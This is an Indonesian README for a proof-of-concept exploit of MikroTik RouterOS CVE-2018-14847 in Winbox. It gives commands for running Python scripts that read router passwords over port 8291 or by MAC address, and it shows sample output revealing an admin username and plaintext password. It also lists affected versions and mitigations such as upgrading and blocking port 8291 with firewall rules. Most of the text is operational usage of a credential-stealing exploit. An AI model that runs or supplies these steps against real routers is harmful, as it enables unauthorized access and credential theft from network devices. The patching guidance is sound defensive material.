PoC (Proof of Concept) dari vulnerability mikrotik CVE-2018-14847 (terutama pada winbox), memiliki cara kerja membaca password langsung dari RouterOS pada port default 8291.
Original by: https://github.com/BigNerd95/
- Python 3+
apt install python3
python3 WinboxExploit.py <IP-ADDRESS> [PORT]
e.g:
$ python3 WinboxExploit.py 192.168.1.1
Connected to 192.168.1.1:8291
Exploit successful
User: admin
Pass: oppaidaisuki123
Anda bisa menggunakan script ini walau tanpa IP address.
Gunakan MACServerDiscovery.py untuk scan router.
python3 MACServerDiscover.py
e.g:
$ python3 MACServerDiscover.py
Looking for Mikrotik devices (MAC servers)
aa:bb:cc:dd:ee:ff
aa:bb:cc:dd:ee:aa
Exploitasi:
python3 MACServerExploit.py <MAC-ADDRESS>
e.g:
$ python3 MACServerExploit.py aa:bb:cc:dd:ee:ff
User: admin
Pass: oppaidaisuki123
RouterOS keluaran 2015-05-28 s/d 2018-04-20
RouterOS versions:
- Longterm: 6.30.1 - 6.40.7
- Stable: 6.29 - 6.42
- Beta: 6.29rc1 - 6.43rc3
Info selengkapnya : https://blog.mikrotik.com/security/winbox-vulnerability.html
- Upgrade RouterOS ke 6.42+
- Nonaktifkan Winbox
- Blok service:
/ip service set winbox address=10.0.0.0/8,172.16.0.0/12,192.168.0.0/16
- Filter Rules (ACL), blok port 8291:
/ip firewall filter add chain=input in-interface=wan protocol=tcp dst-port=8291 action=drop
- Batasi akses login winbox dari MAC Adress:
/tool mac-server mac-winbox